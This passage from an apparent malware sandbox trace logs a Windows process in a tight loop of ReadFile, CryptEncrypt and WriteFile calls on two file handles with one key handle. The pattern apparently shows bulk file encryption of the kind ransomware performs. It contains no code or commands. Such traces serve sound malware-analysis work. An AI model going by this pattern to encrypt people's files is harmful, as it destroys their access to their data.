lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.287] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.287] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.287] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.287] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.287] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.287] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.287] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.287] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.287] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.288] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.288] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.288] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.288] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.288] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.288] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.288] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.288] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.288] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.288] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.288] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.289] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.289] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.289] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.289] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.289] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.289] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.289] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.289] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.289] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.289] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.289] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.289] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.290] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.290] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.290] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.290] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.290] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.290] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.290] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.290] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.290] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.290] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.290] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.290] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.290] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.290] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.291] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.291] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.291] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.291] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.291] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.291] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.291] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.291] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.291] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.291] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.291] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.291] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.291] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.292] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.292] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.292] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.292] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.292] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.292] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.292] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.292] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.292] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.292] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.292] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.292] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.292] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.292] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.292] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.293] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.293] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.293] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.293] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.293] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.293] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.293] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.293] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.293] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.293] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.293] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.293] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.293] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.293] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.293] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.294] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.294] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.294] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.294] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.294] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.294] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.294] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5fa00, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.294] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5fa00*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.294] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5fa00*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5fa00*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.294] ReadFile 